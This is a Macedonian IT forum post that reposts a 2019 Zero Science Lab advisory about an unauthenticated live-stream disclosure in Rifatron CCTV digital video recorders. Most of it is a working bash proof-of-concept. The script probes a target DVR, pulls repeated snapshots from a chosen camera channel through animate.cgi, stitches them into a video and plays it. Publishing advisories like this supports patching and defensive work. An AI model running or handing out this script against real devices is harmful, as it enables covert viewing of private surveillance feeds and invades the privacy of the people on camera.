1. Здраво и добредојдовте на форумот на IT.mk.

    Доколку сеуште не сте дел од најголемата заедница на ИТ професионалци и ентузијасти во Македонија, можете бесплатно да се - процесот нема да ви одземе повеќе од 2-3 минути, а за полесна регистрација овозможивме и регистрирање со Facebook и Steam.
    Сокриј

Rifatron Intelligent Digital Security System (animate.cgi) Stream Disclosure

Дискусија во форумот 'Ранливости // Експлоити // Закрпи' започната од zeroscience, 8 Септември 2019.

  1. zeroscience

    zeroscience
    ZSL Bot v4.89.1.00

    605
    509
    31 Мај 2010
    Код:
    #!/bin/bash
    #
    #
    # Rifatron Intelligent Digital Security System (animate.cgi) Stream Disclosure
    #
    #
    # Vendor: Rifatron Co., Ltd. | SAM MYUNG Co., Ltd.
    # Product web page: http://www.rifatron.com
    # Affected version: 5brid DVR (HD6-532/516, DX6-516/508/504, MX6-516/508/504, EH6-504)
    #                   7brid DVR (HD3-16V2, DX3-16V2/08V2/04V2, MX3-08V2/04V2)
    #                   Firmware: <=8.0 (000143)
    #
    #
    # Summary: Rifatron with its roots in Seoul, Korea has been supplying and
    # servicing the security market as a leading CCTV/video surveillance security
    # system manufacturer, specializing in stand-alone digital video recorder since
    # 1998. We are known for marking the first standalone DVR with audio detection
    # and 480 frames per secone(fps) and have been focusing on highend products and
    # large projects in a variety applications and merket. These include government
    # and public services, banking and finance, hotels and entertatinment, retail
    # education, industrial and commercial sectors throughout Europe, Middle East,
    # the U.S. and Asia. Based on the accumulated know-how in the security industry,
    # Rifatron is trying its utmost for the technology development and customer
    # satisfaction to be the best security solution company in the world.
    #
    # Desc: The DVR suffers from an unauthenticated and unauthorized live stream
    # disclosure when animate.cgi script is called through Mobile Web Viewer module.
    #
    # Tested on: Embedded Linux
    #            Boa/0.94.14rc21
    #
    #
    # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    #                             @zeroscience
    #
    #
    # Advisory ID: ZSL-2019-5532
    # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5532.php
    #
    #
    # 03.09.2019
    #
    
    #{PoC}
    #
    set -euo pipefail
    IFS=$'\n\t'
    if [ "$#" -ne 2 ]; then
        echo "Usage: $0 IP:PORT CHANNEL" # Valid channel integers: 0-15
        echo "Ex.: $0 10.9.8.7:65432 10"
        exit
    fi
    IP=$1
    CHANNEL=$2
    HOST="http://$IP/cgi-bin/animate.cgi?$CHANNEL"
    STATUS=$(curl -Is http://$IP/mobile_viewer_login.html 2>/dev/null | head -1 | awk -F" " '{print $2}')
    if [ "$STATUS" == "404" ]; then
        echo "Target not vulnerable!"
        exit
    fi
    echo "Collecting snapshots..."
    for x in {1..10};
        do echo -ne $x
        curl "$HOST" -o sequence-$x.jpg -#;
        sleep 0.6
        done
    echo -ne "\nDone."
    echo -ne "\nRendering video..."
    ffmpeg -t 10 -v quiet -s 352x288 -r 1 -an -i sequence-%01d.jpg -c:v libx264 -vf fps=10 -pix_fmt yuvj422p video.mp4
    echo " done."
    echo -ne "\nRunning animation..."
    sleep 1
    cvlc video.mp4 --verbose -1 -f vlc://quit
    #
    #{/PoC}
    
    

    Zero Science Lab » Rifatron Intelligent Digital Security System (animate.cgi) Stream Disclosure
     

Сподели

Вчитување...